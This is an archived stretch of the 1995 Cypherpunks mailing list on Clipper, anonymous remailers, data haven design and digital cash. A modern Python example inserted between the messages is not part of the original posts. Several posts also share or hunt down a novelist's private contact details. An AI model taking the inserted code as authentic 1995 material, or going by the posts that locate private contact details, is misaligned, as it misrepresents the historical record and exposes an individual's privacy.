The ``Clipper Chip,'' what NSA, CIA and FBI spooks see as the ideal data protection measure, stands to become national standard if all goes as planned. That is, as more people communicate with digital devices (computers and TVs and eventually telephones and faxes) the need to scramble and unscramble communications will increase -- ideally so that the phone conversation you have with your uncle or the email you send to a co-worker is private and unintelligible to anyone else. However, in the brave new world as it currently is being designed, the feds will also be able to decode every digital signal the Clipper chip scrambles. Consequently, drug kingpins, mafiosi, and anyone else requiring secure communications will have it (real data encryption is cheap and relatively easy to implement), while the remaining information consumers will have Big Brother to contend with. --------------------- end included text ---------------------- FYI, the Advocate accepts letters at 71632.100 at compuserve.com. -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From asgaard at sos.sll.se Mon Jan 9 03:07:59 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Mon, 9 Jan 95 03:07:59 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: wcs at anchor.ho.att.com wrote: > Filtering by filename and type can also be useful - if you don't allow > files named *.gif and *.jpg, users may be less likely to > spam you with pornography. Hardly. (*.gi0 and *.jp0 for a start?) But what are data havens for, if not for controversial data? One of the greatest needs, if not _the_ greatest, in our times for a data haven is probably for storing porno. There is a tremendous, world-wide demand for porno. Yet, there are numerous countries where sex.gif's found on your disk (encrypted or not, they can use thumb-screws to force the key out of your hands) will put you in a very difficult situation (loss of social status, jail, decapitation). It might be much more convenient for, let's say, a Saudi teenager to store his encrypted private gif's in a data haven in Sweden, download them when he feels the urge and purge the copies after every use. Mats From perry at imsi.com Mon Jan 9 03:51:37 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 9 Jan 95 03:51:37 PST Subject: Vinge's True Email name ? In-Reply-To: Message-ID: <9501091150.AA22634@snark.imsi.com> Lou Poppler says: > I knew that old compuserve account was good for something. > They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com Too bad for him that he used his true name. Now lots of "fans" are going to bother him....
.pm From rockwell at nova.umd.edu Mon Jan 9 05:11:16 1995 From: rockwell at nova.umd.edu (Raul Deluth Miller) Date: Mon, 9 Jan 95 05:11:16 PST Subject: remailers Message-ID: <199501091310.IAA13683@nova.umd.edu> I'm wondering if I understand this remailer debate. Here's my summary (based not so much on reading of cypherpunk traffic, but on my understanding of the basic principles): (*) define an encrypting mailer protocol (basically, just PGP or some such). When a mailer receives an encrypted message, it unpacks (0) a message which may have been doubly encoded (once by originator, once by prior remailer to disguise padding) -- if so, must decrypt twice. (1) the message to be forwarded, annotated with control info (e.g. padding, delay, key to reencrypt under) (2) payment information in whatever format is advertised for that remailer. As I understand it the problem with digital cash is defining physical link for the "cash", without compromising the identity of whoever payed into the account. The proposal-to-date involves a guild of remailers. As I see it, this would be primarily of value for shuffling cash around -- call it a build of bankers instead. Once you've established your "cash"-net, presumably with related services such as drop-boxes and temporary accounts, you could use more flexible mechanisms for anonymous mail, which feed off the cash net where necessary. I've not read Chaum(sp?)'s work on encrypted cash, so perhaps I've ignored some terribly obvious issues. [No PGP signature -- at the moment, I don't have a host sufficiently secure to be worth bothering with.] -- Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. (,-:<:)pq is four large primes, e medium x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. 
D=:|.@#.d

From raph at CS.Berkeley.EDU Mon Jan 9 06:48:43 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 9 Jan 95 06:48:43 PST
Subject: List of reliable remailers
Message-ID: <199501091450.GAA27265@kiwi.CS.Berkeley.EDU>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
$remailer{"q"} = " cpunk hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 9 Jan 95 6:00:01 PST

remailer  email address                     history        latency  uptime
-----------------------------------------------------------------------
nately    remailer at nately.ucsd.edu       ++++++++++     1:28:30  99.99%
rahul     homer at rahul.net                 **#**##****#      4:31  99.99%
mix       mixmaster at nately.ucsd.edu      ++-+-++-++       48:36  99.99%
penet     anon at anon.penet.fi              *+****+*****     28:32  99.99%
vox       remail at vox.xs4all.nl            -----------   14:34:13  99.99%
usura     usura at replay.com                -- -+--+***      22:31  99.44%
bsu-cs    nowhere at bsu-cs.bsu.edu          +##**##***+#     23:14  99.26%
ideath    remailer at ideath.goldenbear.com  * --- -----    2:08:58  99.12%
q         q at c2.org                        --+--*++--     2:33:18  98.62%
soda      remailer at csua.berkeley.edu      -..-.- ...     8:10:14  98.47%
alumni    hal at alumni.caltech.edu          ++ *-**+****      7:37  97.74%
portal    hfinney at shell.portal.com        ** *-#*#*#**      5:32  97.74%
c2        remail at c2.org                   *--*+* *+      1:13:45  95.50%
desert    remail at desert.xs4all.nl         _.----.---    19:54:01  94.80%
extropia  remail at extropia.wimsey.com      ++__ +++++    13:02:14  84.83%
xs4all    remailer at xs4all.nl              *-- -+***        16:29  76.54%
rebma     remailer at rebma.mn.org           -*___-__-     31:31:05  70.47%
flame     tomaz at flame.sinet.org           -*-*+            29:22  37.83%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

Options and features

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp   Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
special  Accepts only pgp encrypted messages.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From pcw at access.digex.net Mon Jan 9 07:09:57 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Mon, 9 Jan 95 07:09:57 PST
Subject: Vinge's True Email name ?
Message-ID: <199501091510.AA16373@access3.digex.net>

>Lou Poppler says:
>> I knew that old compuserve account was good for something.
>> They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com
>

Of course, he might have used his true name because he wanted to hear from people. Tom Clancy seems to enjoy the newsgroup created to discuss his books and he posts there regularly. Many people strive to become famous because they love the adulation of the fans. Others don't. Who knows about VV?

From RGRIFFITH at sfasu.edu Mon Jan 9 07:32:20 1995
From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu)
Date: Mon, 9 Jan 95 07:32:20 PST
Subject: Anonymous payment scheme
Message-ID: <01HLMZ1MIHOM000TCU@TITAN.SFASU.EDU>

>At 09:45 AM 1/3/95 -0800, Hal wrote:
>> ... As I wrote, banks are
>>required to get SS#'s for depositors right now, and I wouldn't expect
>>that to change any time soon.
If anything, the trend appears to be >>towards more tightening rather than less. ... > >Isn't that only a requirement on interst-bearing, or potentially >interest-bearing, accounts? > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > Yes, but the account form will have a place for it anyway and the account opening person will demand it. My experience a few years ago was that I had to go to an officer and point out that the account was not interest bearing and so the SS# was not required in order to get the account opened without it. From nesta at nesta.pr.mcs.net Mon Jan 9 07:37:40 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 07:37:40 PST Subject: Data Haven problems In-Reply-To: Message-ID: On Mon, 9 Jan 1995, Mats Bergstrom wrote: > Hardly. (*.gi0 and *.jp0 for a start?) > But what are data havens for, if not for controversial data? > One of the greatest needs, if not _the_ greatest, in our times > for a data haven is probably for storing porno. There is a > tremendous, world-wide demand for porno. Yet, there are numerous > countries where sex.gif's found on your disk (encrypted or not, > they can use thumb-screws to force the key out of your hands) > will put you in a very difficult situation (loss of social > status, jail, decapitation). It might be much more convenient > for, let's say, a Saudi teenager to store his encrypted private > gif's in a data haven in Sweden, download them when he feels > the urge and purge the copies after every use. My feelings exactly. Are we going to fall prey to the medias asault on porno and resort to self-censorship? If a data haven resorted to filtering out all gifs and jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my porn, nor for my other data. If it is going to be a datahaven it can;t fall to such things as filtering data for controversial subject the owner doesn't like. 
i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From paul at poboy.b17c.ingr.com Mon Jan 9 07:45:17 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Mon, 9 Jan 95 07:45:17 PST Subject: Data Haven problems In-Reply-To: <199501071710.LAA21334@pentagon.io.com> Message-ID: <199501091546.AA19741@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Any ideas on how to guard against mailbombs, and to confirm to the sender > that their files are stored successfully? Perhaps do a mailing with > a test command that validates the existance of the file, and sends a > reply back wether the file is okay or not, or would this result in a > possible security hole? To solve problem #1, use digital postage of some form. Digicash, FV, Tacky Tokens, Mountain Dew futures... just require a per-storage-unit charge _to initially check in the file_. You can of course charge for storage over time, too. To solve problem #2, send an MD5 hash of the file back to the sender. Ideally, you would also provide (in perl, C source, csh, or whatever) a submission script which outputs an MD5 hash before the file is sent. As long as the before-sending hash matches the hash returned by the haven, you can assume that the file is intact. > Lastly, instead of postage (like a remailer would get), how hard would it > be to implement "rent" where if the "rent" is not paid, and a grace period > has elapsed the file would be trashed. All this while preserving the > anonymity of the sender and the data haven site. Not very. Use a dbm database to map "rent due" dates by file, then periodically sweep through the database. > As to the code, this will have to be my second rewrite as I am going to > do it in perl code, rather than C... last rewrite was from a daemon to > a program activated by a .forward file. 
Perl has the nice property of being fairly portable, too. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### From agarcia at Starbase.NeoSoft.COM Mon Jan 9 08:27:41 1995 From: agarcia at Starbase.NeoSoft.COM (Anthony Garcia) Date: Mon, 9 Jan 95 08:27:41 PST Subject: Vinge's True Email name ? In-Reply-To: <199501091510.AA16373@access3.digex.net> Message-ID: <199501091628.KAA00456@Starbase.NeoSoft.COM> As Wei Dai pointed out, the hostname of Vernor Vinge's office workstation at San Diego State University can be easily determined in about 5 minutes of poking about. (He appears to have about 10-15 shells running at any given time...) I really enjoy his work. However, I've never sent him any email. The general impression I've gotten is that he prefers not to receive fan email, since it distracts him from important work. If you *really* want to send him fan mail, I recommend sending it in paper form to his publisher. First, this allows him to better handle fan mail in batches. Second, this gives his publisher some indication of interest in his work, and maybe gets him a better deal on his next book. -Anthony Garcia agarcia at neosoft.com From rsalz at osf.org Mon Jan 9 08:28:01 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 9 Jan 95 08:28:01 PST Subject: Remailer Abuse Message-ID: <9501091624.AA05922@sulphur.osf.org> What lists did you post to?
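
An added example, not part of any message in this archive: the check-in receipt and rent sweep that Paul Robichaux outlines in his "Data Haven problems" reply above, written in Python rather than the perl the thread mentions. The names `Haven`, `check_in`, `audit`, `sweep` and `receipt_matches`, the handle format and the seven-day grace period are hypothetical; SHA-256 is swapped in for the MD5 the post names; and the nonce-based `audit` goes beyond the post to cover the later "test command" asked about in the text he quotes.

```python
import dbm
import hashlib
import hmac
import os
import re
import tempfile

GRACE_SECONDS = 7 * 24 * 3600  # assumed grace period; the thread gives no figure


def digest(data: bytes, algorithm: str = "sha256") -> str:
    # The post names MD5. SHA-256 is swapped in as the default because MD5
    # does not resist deliberate collisions; pass "md5" to match the post.
    return hashlib.new(algorithm, data).hexdigest()


class Haven:
    """Toy haven (hypothetical design): blobs on disk, rent-due dates in dbm."""

    def __init__(self, root: str):
        self.blobs = os.path.join(root, "blobs")
        self.rent_db = os.path.join(root, "rent")
        os.makedirs(self.blobs, exist_ok=True)

    def path(self, file_id: str) -> str:
        # Handles arrive from untrusted senders: accept only our own format
        # so a handle such as "../rent" can never name a file outside blobs/.
        if not re.fullmatch(r"[0-9a-f]{16}", file_id):
            raise ValueError("malformed file handle")
        return os.path.join(self.blobs, file_id)

    def _read(self, file_id: str) -> bytes:
        with open(self.path(file_id), "rb") as fh:
            return fh.read()

    def check_in(self, data: bytes, paid_until: float,
                 algorithm: str = "sha256") -> dict:
        """Store data and return a receipt hashed from the bytes read back."""
        file_id = os.urandom(8).hex()  # random handle, unrelated to the sender
        with open(self.path(file_id), "wb") as fh:
            fh.write(data)
        with dbm.open(self.rent_db, "c") as db:
            db[file_id.encode()] = repr(float(paid_until)).encode()
        return {"id": file_id, "algorithm": algorithm,
                "digest": digest(self._read(file_id), algorithm)}

    def audit(self, file_id: str, nonce: bytes) -> str:
        """Answer a later "is my file intact?" probe with H(nonce || file)."""
        # A fresh nonce means the haven cannot replay the check-in digest;
        # it has to hold the bytes at the time of the probe.
        return digest(nonce + self._read(file_id))

    def sweep(self, now: float) -> list:
        """Delete files whose rent lapsed more than GRACE_SECONDS before now."""
        evicted = []
        with dbm.open(self.rent_db, "c") as db:
            for key in list(db.keys()):
                if float(db[key].decode()) + GRACE_SECONDS < now:
                    try:
                        os.remove(self.path(key.decode()))
                    except FileNotFoundError:
                        pass  # blob already gone; still drop the rent record
                    del db[key]
                    evicted.append(key.decode())
        return evicted


def receipt_matches(local_copy: bytes, receipt: dict,
                    algorithm: str = "sha256") -> bool:
    """Sender side: compare the hash taken before sending with the receipt."""
    if receipt.get("algorithm") != algorithm:
        return False  # do not let the haven pick a weaker hash for us
    return hmac.compare_digest(digest(local_copy, algorithm), receipt["digest"])


def demo() -> dict:
    """Run the exchange on constructed sample data and report each outcome."""
    document = b"constructed sample file\n"
    now = 1_000_000.0  # constructed clock value, seconds
    with tempfile.TemporaryDirectory() as root:
        haven = Haven(root)
        kept = haven.check_in(document, paid_until=now + 30 * 86400)
        in_grace = haven.check_in(b"late", paid_until=now - 3600)
        lapsed = haven.check_in(b"unpaid", paid_until=now - GRACE_SECONDS - 1)
        nonce = os.urandom(16)
        return {
            "receipt_ok": receipt_matches(document, kept),
            "damage_detected": not receipt_matches(document + b"x", kept),
            "audit_ok": haven.audit(kept["id"], nonce) == digest(nonce + document),
            "evicted_only_lapsed": haven.sweep(now) == [lapsed["id"]],
            "grace_honoured": os.path.exists(haven.path(in_grace["id"])),
        }


if __name__ == "__main__":
    print(demo())
```

The check-in receipt only shows that the haven received the right bytes; the `audit` probe is what tells a sender, who must still hold the file or a precomputed nonce and answer pair, that the haven has it at a later date.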
From rfb at lehman.com Mon Jan 9 09:01:00 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Mon, 9 Jan 95 09:01:00 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9501091655.AA24435@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: "Jim Grubs, W8GRT" Date: Tue, 13 Dec 94 11:27:45 EST Rick Busdiecker writes: > Even Apple & Microsoft agree that Netscape is brain dead... Please be more careful in your attributions. The extent to which I wrote the above comment is that I quoted it from someone else's article. Rick From eric at remailer.net Mon Jan 9 09:09:35 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 9 Jan 95 09:09:35 PST Subject: More signal than YOU can handle. In-Reply-To: <199501090837.DAA29692@bb.hks.net> Message-ID: <199501091709.JAA25055@largo.remailer.net> From: "L. Todd Masco" For the moment, all of the archives that Eric just dropped me are on ftp://ftp.hks.net/cypherpunks/All This includes all the stored messages at toad.com from the beginning of time up to a few months ago. I've got a short lacuna at toad.com from some deletion I never understood, but it's only a few weeks long and is covered by Todd's archive. I would like someone to make an official enumeration of the articles as they passed out to the list for global reference. You may self-volunteer by grabbing the archives above and starting.
Eric From eric at remailer.net Mon Jan 9 09:24:53 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 9 Jan 95 09:24:53 PST Subject: Data Haven problems In-Reply-To: <199501071710.LAA21334@pentagon.io.com> Message-ID: <199501091724.JAA25074@largo.remailer.net> From: dfloyd at io.com While programming my data haven code, I am wondering how to guard against spamming the data haven parser. Here's an example of where the mechanism/policy distinction helps a lot. Mechanism here is how you store data. Policy is how you decide whether to accept a particular request. The suggestions to date have all suggested particular policies to put into your code (with the exception of Bill Stewart). In addition, almost all of these suggestions have been pay-per-use. As significant as policies are, they aren't your most important issue right now. The single thing you need to get right today is the means of separating the mechanism from the policy. Different operators will have different policies. If it's difficult to change policies, fewer services will be offered. The issue of policy separation is a software architecture one. I don't know the structure of your code, but I'd suggest that whatever it looks like, that you make a (1) clean interface and that you (2) document it. If you do these two things, you'll have substantially achieved separation. I think you should spend more time worrying about the interface than about the specific policies. In order to focus on the policy interface, I'd suggest an extremely simple policy to work with, namely, an access list. Anyone listed can use the server; everyone else is denied. That will get you started. I would distribute your first code with a simple policy such as this. It will allow prototypes to get worked on. Since a data haven isn't of much use without clients for it, a simple policy is adequate for a first release. 
Eric From a.brown at nexor.co.uk Mon Jan 9 09:28:31 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Mon, 9 Jan 95 09:28:31 PST Subject: RC5 data, anyone? Message-ID: Has anyone got any plaintext/cyphertext/key data sets that I can use to test my RC5 implementation against? +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From bdolan at well.sf.ca.us Mon Jan 9 09:54:33 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Mon, 9 Jan 95 09:54:33 PST Subject: Rumored CBS "hit" on internet coming Message-ID: <199501091755.JAA10056@well.sf.ca.us> This may be old news or it could be bogus but fyi anyway: >From parsons at bga.com Mon Jan 9 05:16:49 1995 >From: Brad Parsons >Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) >To: bdolan at well.sf.ca.us > > >Brad, Could you forward this to the cypherpunks list? Thanks.--BJP > >---------- Forwarded message ---------- >Date: Mon, 9 Jan 1995 03:48:01 -0600 (CST) >Subject: CBS/C.Chung Plan Hit Job on Internet? > >A friend tells me that CBS and Connie Chung plan a hit job on Internet >on the evening news today, 1/9/95. Apparently it may be in the context >of youths supposedly learning how to make bombs from online info. In >case I don't get to watch it, could somebody make it a point to watch >it and give us a summary of the report. Thanks. Reply, if you're inclined, via e-mail. I'm off the list until the Carol Ann stuff dies out. - Brad Dolan, bdolan at well.sf.ca.us  From s675570 at aix1.uottawa.ca Mon Jan 9 10:48:35 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Mon, 9 Jan 95 10:48:35 PST Subject: Vinge's True Email name ? 
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM> Message-ID: On Mon, 9 Jan 1995, Anthony Garcia wrote: > If you *really* want to send him fan mail, I recommend sending it in > paper form to his publisher. First, this allows him to better handle I can see your point, but since it's been asked (and you're all responsible people and he knows about killfiles) This is the address I just found in the cyberpunk faq : vinge at aztec.sdsu.edu And btw, thanks for all the replies to my True Names question. I did end end up finding it (on loan), but somehow this city's used bookstores seem to have every one of his books but True Names. Sigh... Back to crypto though, would anybody know about any more recent works on the NSA than Puzzle Palace (other than the Wired articles or the NSA handbook that was posted to the net)? For that matter, has anybody heard of a recently published book on the Canadian Security Establishment (it came out just two months ago I think, I just can't remember the author or title) or anything else on that agency? Mucho Thank you. From nissim at acs.bu.edu Mon Jan 9 10:51:09 1995 From: nissim at acs.bu.edu (nissim at acs.bu.edu) Date: Mon, 9 Jan 95 10:51:09 PST Subject: positive publicity for anonymity Message-ID: <199501091843.NAA112415@acs.bu.edu> I've just posted a proposal to alt.config for a new group alt.temping I'm hoping that temporary workers will use this as a forum to compare and contrast temp agencies, wage differences, 'permanent hire penalties' etc. There are about 4.4 million business service temps in the US. Wage differentials are noticeable - one egency will pay $2.00 more than another; this means $320/month to a temp worker. I expect temps to use anonymous posting capabilities to compare wage rates and company patterns *anonymously* because they may fear discrimination from their agencies. (I know I would) This seems like a very positive use of anonymity. 
Not only will millions of people on the bottom rung of office life be able to gain advantage by information, there are clear parallels to areas in the past of the left where unions and workers rights were seen as causes of first importance. In fact, the troubles involved in being temporary have been championed several times on television. This might make a good counterargument to 'teenagers and pipe bombs' If we say anonymity is a tool that helps up to 3-4% of the work force make intelligent choices and get paid more we may key into the left wing slant of the media. Treon Verdery (not posting from Adam's account this time!) From perry at imsi.com Mon Jan 9 11:07:22 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 9 Jan 95 11:07:22 PST Subject: AT&T produces video encryptor -- is it clipper based? Message-ID: <9501091904.AA19196@webster.imsi.com> I just saw a story go by on the dow jones wire saying that AT&T had developed a "comprehensive security system for commercial information services". It is said to be an encryption system developed jointly by Bell Labs and VLSI, and its intedned for set-top boxes and "the internet". VLSI was one of the contractors on Clipper. Anyone know if this is an "escrowed" system? Anyone know any other details? Perry From ghio at c2.org Mon Jan 9 11:32:46 1995 From: ghio at c2.org (Matthew Ghio) Date: Mon, 9 Jan 95 11:32:46 PST Subject: Remailer source In-Reply-To: <199412301935.AA22766@von-neumann.info.polymtl.ca> Message-ID: <199501091929.LAA22433@infinity.c2.org> Octavian Ureche wrote: > Does anybody know where could I find UNIX sources > for a remailer ? ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer From tcmay at netcom.com Mon Jan 9 11:47:52 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 9 Jan 95 11:47:52 PST Subject: Experiments and Toys vs. 
the Real Thing
Message-ID: <199501091946.LAA06410@netcom18.netcom.com>

The debate about data havens and what they ought to really be, what they ought to really accept, etc., is similar to debates about what digital money ought to be, how remailers ought to operate, etc.

It's useful to categorize projects as "experimental" (or "toy," with no negative connotations implied) or "commercial" (or "real," I suppose):

* EXPERIMENTAL, or TOY: Early efforts, meant to help illuminate the issues, uncover problems, gain knowledge, educate people, etc.

* COMMERCIAL, or REAL: More robust, well-established. Usually "for pay," and expected to be maintained, available, professionally operated.

Now there's a fuzzy distinction between these, a continuum, really. For example, PGP began life (esp. as v. 1.0) as an amateur or experimental thing, with a few hacker experimentalists playing with it. Version 2.x has been usable as a commercial tool, every bit as good as "MailSafe," the ostensibly commercial RSADSI tool. The user community has added enough capability and hooks to clearly put PGP in the COMMERCIAL category: robust, supported, etc.

Remailers are _almost_ in the second category, especially when taken as an ecological whole. (That is, any single remailer may be flaky--though many aren't--but the pinging and reputation tools that support the ecology make the ensemble more robust and usable.) Many of us believe that "digital postage" paid remailing will be the final step needed to move remailers into the commercial/real category. Until then, they're not businesses--they're hobbies and experiments. (Which is fine, as one of the main reasons for Cypherpunks was to take the academic papers presented at Crypto conferences and reify them in working code, as experiments.)

Digital cash is more clearly still at the experimental level, as are anonymous markets (like BlackNet), data havens, and so forth.

Why do I mention these points?

Because there's a danger in "premature professionalization." And a danger in criticizing experimental or toy efforts for not being "pure enough."

The recent claims that nascent "data havens" _must_ support all files, including hard-core porn, weapons secrets, etc. seem to be an example of this. I'm not for censorship, just concerned that the data haven _experiments_ are not secure enough, not robust enough, to actually carry high-visibility files.

For example, data havens will clearly someday be used to carry defense secrets, troop movements, weapons manufacturing details, etc. But I would not want to carry them on my "experimental data haven," for obvious reasons. Even if I only carried "non-American" secrets, such as reports on Russian troop maneuvers around Grozny, I could expect visits from American officials (to stop me, to plant data they want planted, etc.).

(And let's not forget "snatch teams" that grab foreign nationals suspected of crimes...Israel, Iraq, Iran, and the U.S. have grabbed people in other countries. And more common is simple execution. If a Swedish data haven carried files related to U.S. operations, and the data haven location was known--part of what I mean by saying the enabling technologies do not yet exist--then various measures would be applied. Diplomatic, equipment sabotage, even killing the operators. I'm not being Ludlumesque here...clearly such "threats to national security" would be seen as justifying various reactions. Especially to send a message to other potential operators.)

Those advocating a "purist" (= professional/real) approach to data havens, seen recently in the calls for data havens to never screen files or accesses, should bear in mind that "data haven technology" is lacking. Remailer chains leading in and out of data havens are still non-robust, subject to attacks and compromises. And of course, digital cash is still being thrashed out.

An experimental data haven that allowed unscreened access or depositing of information would also become a magnet for kooks, for those wishing to sabotage such havens, etc. If truly serious information was found on the haven, huge efforts would be mounted to find the source, get the site shut down, etc. Current remailer technology is just not up to the challenge. (I'm not saying it won't someday be, just not now.)

Criticizing experimental data havens for "not going all the way" seems to me to be wrong-headed. First, there's the usual issue of who bears the risk, with those not at risk urging others to put themselves and their sites at risk by being "pure." Second, and more important, the enabling technologies for data havens are just not yet themselves available and robust. A data haven that carries "Four Horsemen of the Infocalypse" material will come under strong attack, legal, cryptographic, and physical.

There's a place for experimental or toy implementations, e.g., data havens that operate in some limited domain. This allows the issues to get explored before full-scale attacks are mounted. Think of it as a training exercise, a drill, or an immunization.

--Tim May, who thinks the first real data havens will come under intense attack and so had better be secure from the start

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From ddt at lsd.com Mon Jan 9 11:48:43 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Mon, 9 Jan 95 11:48:43 PST
Subject: HUMOR:...and we thought _PRZ_ had troubles!
Message-ID: My apologies for this non-crypto posting, but I just _couldn't_ resist sharing. Ironically (incredulously?), paranoia does nothing to improve one's grasp of adjectives and adverbs... Anyway, please, please restrict your replies (if any) to private email amongst yourselves and don't follow my poor example and post anything more about it to the list. BTW..."Half" street?! dave ____________________________________ "Fascinating, Captain." -Mr. Spock =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Newsgroups: alt.alien.visitors Subject: Truth or Paranoia? From: doctor.doom at citylink.uu.holonet.net Date: Fri, 6 Jan 95 21:56:00 EST I found the following disturbing post on a BBS in the Washington DC area: Msg # 48 of 83 Date: Fri 12-03-93, 6:29 pm From: UNIT Read: 7 times [1 Reply] Forwarded From: 1900 Half Street, SW Subject: important The story I am about to relate may seem incredulous in many ways even thought it is true and I solemly attest that it is true despite the fact that it seems incredulous in many ways there is verifiable evidence and i urge you to verify the evidence on your own if you should find this incredulous which is the natural response. I am a victim of government sponsored terrorism and racism sponsored by the us government and big corporations which actually work HAND IN HAND with the us government towards these ends. This of course includes the liberal media although some cells of independence remain and not all individual journalists are accessories to the conspiracy. Suffice it to say that democracy does not in any way exist in the United States of AmeriKKKa. The government has been out to get me ever since I was born in 1966 as a result of a specific genetic coding abnormality which makes me unique among the 99.9999 th percentile of the American population and makes people like me marked for harrassment. 
The abnormality may have been spawned by mass CIA mind control tests conducted in 1961, which affected certain birth patterns. They actually have attempted to cause me to try to kill myself on several occasions and have attempted to drive me crazy by chemical and psychological means including retroactive radio control from the future (any scientist will tell you that radio waves which move faster than light speed are capable of moving backwards in time and thus controlling the past). The constant chemical assaults on my well being mean I cannot leave my apartment except in dire circumstances and then I must breathe through a gas mask. Not only that but people are strategically placed at all places I interact with people out of necessity (I cannot avoid such encounters entirely) to make me self aware and paranoid. These efforts are futile and I continue to defy the Amerikkkan government.

